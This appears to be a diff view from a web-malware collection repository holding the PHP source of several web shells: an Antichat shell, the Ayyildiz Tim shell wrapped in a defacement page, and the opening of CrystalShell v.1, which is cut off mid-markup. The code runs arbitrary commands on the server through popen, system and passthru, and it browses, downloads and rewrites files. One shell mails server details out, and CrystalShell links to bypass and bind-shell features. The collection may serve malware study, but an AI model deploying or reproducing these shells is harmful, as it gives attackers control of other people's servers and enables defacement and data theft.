$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
if(@$_POST['action']=="exit")unset($_SESSION['an']);
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
if($_SESSION['an']==0){
echo $header;
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
echo $footer;
exit;}
if($_SESSION['action']=="")$_SESSION['action']="viewer";
if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);
}
//end downloader
?>
<? echo $header;?>
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
<table><tr>
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
</tr></table></td></tr></table><br>
<form name='reqs' method='POST'>
<input name='action' type='hidden' value=''>
<input name='dir' type='hidden' value=''>
<input name='file' type='hidden' value=''>
</form>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" valign="top">
<?
//shell
function shell($cmd){
if (!empty($cmd)){
$fp = popen($cmd,"r");
{
$result = "";
while(!feof($fp)){$result.=fread($fp,1024);}
pclose($fp);
}
$ret = $result;
$ret = convert_cyr_string($ret,"d","w");
}
return $ret;}
if($action=="shell"){
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
<input type=\"submit\" value=\"execute\"></form>";}
//end shell
//viewer FS
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function scandire($dir){
$dir=chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<tr><td>Select drive:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
echo "</td></tr>";
}
echo "<tr><td>OS: ".@php_uname()."</td></tr>
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
<td>'.perms($linkfile).'</td>
<td>
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
}
echo "</table>";
}}}
if($action=="viewer"){
scandire($dir);
}
//end viewer FS
//editros
if($action=="editor"){
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
$contents = fread($le, filesize($file));
fclose($le);}
return htmlspecialchars($contents);
}
if($_POST['save'])writef($file,$_POST['data']);
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
}
//end editors
?>
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
<? echo $footer;?>

317
web-malware-collection-13-06-2012/PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt Normal file
View file

@ -0,0 +1,317 @@
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Ayyildiz Tim | AYT | Shell v 2.1 Biz B&uuml;y&uuml;k T&uuml;rk Milletinin Hizmetindeyiz...</title>
</head>
<body>
</body>
</html>
<html>
<head>
<meta name="distribution" content="GLOBAL">
<META name="ROBOTS" content="ALL">
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
<meta name="Copyright" content=TouCh By iJOo">
<META NAME="RATING" CONTENT="GENERAL">
<meta name="Description" content="Thehacker">
<meta name="KeyWords" content="DefaCed">
<title>HACKED BY AYYILDIZ ™</title>
<STYLE TYPE="text/css">
<!--
body {
scrollbar-3d-light-color : #404040;
scrollbar-arrow-color: black;
scrollbar-base-color: black;
scrollbar-darkshadow-color: #404040;
scrollbar-face-color: black;
scrollbar-highlight-color: #404040;
scrollbar-shadow-color: black;
scrollbar-track-color: #404040; }
-->
</STYLE>
<script language="JavaScript1.2">
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
</head>
<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
<bgsound src="bayrak.mp3" loop="infinite">
<center><font color="red" size="10" face="Imprint MT Shadow">
</font>
<TR>
<TD vAlign=center align=left width=144>
<SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
</TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><BR>
<P align=left></P></TD></TR>
<TR>
<TD vAlign=center align=left width=144></TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
<STYLE>BODY {
BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
}
.ldtab1 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab2 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab3 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtxt1 {
PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
}
.ldtxt2 {
FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:link {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:visited {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:active {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:hover {
BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
}
A {
TEXT-DECORATION: none
}
</STYLE>
<!-- MELEK -->
<DIV align=center>
<DIV id=welle
style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT
color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT
color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT
color=#ff0000></DIV></DIV>
<DIV align=center></DIV>
<SCRIPT language=JavaScript>
<!--
function welle()
{
if(document.all.welle.filters[0].freq > 10)
document.all.welle.filters[0].freq = 5;
document.all.welle.filters[0].freq += 1;
if(document.all.welle.filters[0].phase > 100)
document.all.welle.filters[0].phase = 0;
document.all.welle.filters[0].phase += 10;
if(document.all.welle.filters[0].strength > 10)
document.all.welle.filters[0].strength = 1;
document.all.welle.filters[0].strength += 1;
window.setTimeout("welle()",100);
}
welle();
file://-->
</SCRIPT>
</FONT></TD></TR></TBODY></TABLE></DIV>
<?php
define('PHPSHELL_VERSION', '');
?>
<html>
<head>
<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
<style type="text/css">
<!--
.style1 {color: #FF0000}
.style2 {
font-family: Tahoma;
font-size: 9px;
font-weight: bold;
}
-->
</style>
</head>
<body>
<div align="center">
<table width="918" height="484" border="15">
<tr>
<td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
<div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span> <?php
if (ini_get('register_globals') != '1') {
/* We'll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
</div>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?>
</b></p>
<p align="center"><strong>Dizin Degistir</strong> :
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select>
</p>
<p align="center"><strong>Komut</strong>:
<input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Komut Calistir">
</p>
<p align="center"><strong>Surekli Bagli Kal</strong>
<input type="checkbox" name="stderr">
</p>
<div align="center">
<textarea name="textarea" cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</div>
</form>
<div align="center">
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
</div> <hr align="center"> <p align="center" class="style2">Copyright &copy; 2006&ndash;2007, Powered byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
<p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
<p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
</tr>
</table>
</div>
</body>
</html>
</font></font></font></font></font></font></font></font></font></font></font>
</font>
<!--
/*
I Always Love Sha
*/
</BODY></HTML>

2226
web-malware-collection-13-06-2012/PHP/Backdoor.PHP.Agent.php Normal file
View file

File diff suppressed because it is too large Load diff

1127
web-malware-collection-13-06-2012/PHP/Crystal.txt Normal file
View file

File diff suppressed because it is too large Load diff

929
web-malware-collection-13-06-2012/PHP/CrystalShell v.1.txt Normal file
View file

@ -0,0 +1,929 @@
<?
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
/**********************************************************/
/* CrystalShell v.1
/* --------- ----------
/*
/* Coded by : Super-Crystal and Mohajer22
/* ------------------------------------------------
/* Arab Security Center Team <---thanks
/* mail : sup3r-hackers@hotmail.Com
/* october73 shell & CrystalShell < coding by super crystal
/*
/*********************************************************/
?>
<?$dir=realpath("./")."/";
$dir=str_replace("\\","/",$dir);
?>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
Crystal shell</title>
<style>
td {
font-family: verdana, arial, ms sans serif, sans-serif;
font-size: 11px;
color: #D5ECF9;
}
BODY {
margin-top: 4px;
margin-right: 4px;
margin-bottom: 4px;
margin-left: 4px;
scrollbar-face-color: #b6b5b5;
scrollbar-highlight-color: #758393;
scrollbar-3dlight-color: #000000;
scrollbar-darkshadow-color: #101842;
scrollbar-shadow-color: #ffffff;
scrollbar-arrow-color: #000000;
scrollbar-track-color: #ffffff;
}
A:link {COLOR:blue; TEXT-DECORATION: none}
A:visited { COLOR:blue; TEXT-DECORATION: none}
A:active {COLOR:blue; TEXT-DECORATION: none}
A:hover {color:red;TEXT-DECORATION: none}
input, textarea, select {
background-color: #EBEAEA;
border-style: solid;
border-width: 1px;
font-family: verdana, arial, sans-serif;
font-size: 11px;
color: #333333;
padding: 0px;
}
</style></head>
<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
<p align="center">&nbsp;</p>
<p align="center">
<a bookmark="minipanel">
<font face="Webdings" size="7" color="#DCE7EF">ö</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
<font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span>&nbsp;&nbsp;&nbsp;&nbsp; </font>
<font color="#FFFF00" face="Arial" size="7"><span lang="en-us">0.2</span></font></p>
</p>
<a bookmark="minipanel">
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
<p align="center">
<b>
<?
$dirfile="$file_to_download";
if (file_exists("$dirfile"))
{
header("location: $dirfile");
}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "<font color=\"red\">ON (secure)</font>";
}
else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
echo("Safe-mode: $hsafemode");
// PHPINFO
if ($_GET['action'] == "phpinfo") {
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
exit;
}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
echo("<br>");
echo("Open base dir: $hopenbasedir");
echo("<br>");
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<br>");
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
echo("<br>");
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
echo("<br>");
echo "PHP version: <b>".@phpversion()."</b>";
echo("<br>");
echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
echo("<br>");
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
?>
</b></p>
<p align="center">&nbsp;</p></td></tr></table>
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
<b>
</b></p>
<p align="center">&nbsp;</p></td></tr></table>
</a>
</p>
<p align="center"><font color="#FFFF00">&nbsp;</font></p>
<p align="center"></p>
</th></tr><tr>
<td bgcolor="#000000" style="color: #DCE7EF">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font size="4px">
<b>
<font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
</font>
</p>
</font>
<font size=1 face=Verdana>
<p align="left"><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
</b>
</font>
</font>
<a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
<font size=-2 face=verdana color="#FFFFFF">
<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
</font>
</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
<br>&nbsp;<b><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px"><font color="#FF0000" face="Verdana" size="-2">
</font></font><font color="#FF0000" face="Verdana" size="2">
&nbsp;</font></a><font size=2 face=verdana></a></font><font face="Verdana" size="2">&nbsp;</font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="1" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
</font></a><font face="Wingdings" size="1" color="#C0C0C0">ð</font><span lang="en-us"><font size="1" color="#C0C0C0" face="Webdings">
</font></span><font face=Verdana color="white"><font color="#CC0000" size="1"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="ãÚáæãÇÊ ÇáÜPhp" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font><font size="1"></a></font></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="1">2</font></span><b><font size=1 face=verdana>
</font>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="1">&nbsp;</font></font><font face="verdana" color="white"><span lang="en-us"><a title="ÇáÃÏæÇÊ" href="?act=tools"><font color=#CC0000 size="1">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="1">4</font></span></a><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
</font>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font></font>
<font face="verdana" color="white"><span lang="en-us">
<a title="ÇáÊÔÝíÑ" href="?act=decoder"><font color=#CC0000 size="1">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="1">i</font></span></a><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
</font>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font>
</font><span lang="en-us"><font face="verdana" color="white">
<font color=#CC0000 size="1">
<a title="ËÛÑÇÊ ÇáãÑæÑ" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font><font size="1"></a></font></font><font face="Webdings" size="1" color="#C0C0C0">`</font></span><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
</font>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span> </font>
</font><font face="verdana" color="white"><span lang="en-us">
<a title="ÇáÅÊÕÇá ÈÞÇÚÏÉ ÇáÈíÇäÇÊ" href="?act=SQL"><font color=#CC0000 size="1">SQL</font></a></span></font></b><font face="Webdings" size="1" color="#C0C0C0">Â</font><b><font size="1" face="verdana" color="white"></a></font></b><font size="1"></font></font><b><font size=1 face=verdana>
</font></b><font size="4px"><b>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us">&nbsp;</span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="1">Bind</font></a></font></span></b><font face="Webdings" size="1" color="#C0C0C0">Â</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="1"> </font>
</font></b></font><font face="verdana" color="white">
<b>
<span lang="en-us"><font color=#CC0000 size="1">
<a title="ÇáãÓÇÚÏÉ" href="?act=help"><font color="#CC0000">help</font></a></font></span><font size="1"></a></font></b></font><b><font size="1"></a></font><font size=1 face=verdana>
</font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="1">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="1"><a title="ÇÞÑÇÁäí" href="?act=about"><font color="#CC0000">about</font></a></font></span><font size="1"></a></font></font><font size="1"></a></font><font size=1 face=verdana>
</font></b><span lang="en-us"><font size=1 face=Wingdings color="#C0C0C0">
?</font></span></p>
<p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
<font size="4px">
<font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font size=-2 face=verdana color=#CC0000>server </font>
<font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
</font></a></font>
</a></font>
</font><b>
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font>
<font size=-2 face=verdana color=white>
<font size="4px" face="verdana" color="white">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font face=Verdana size=-2 color="#008000">
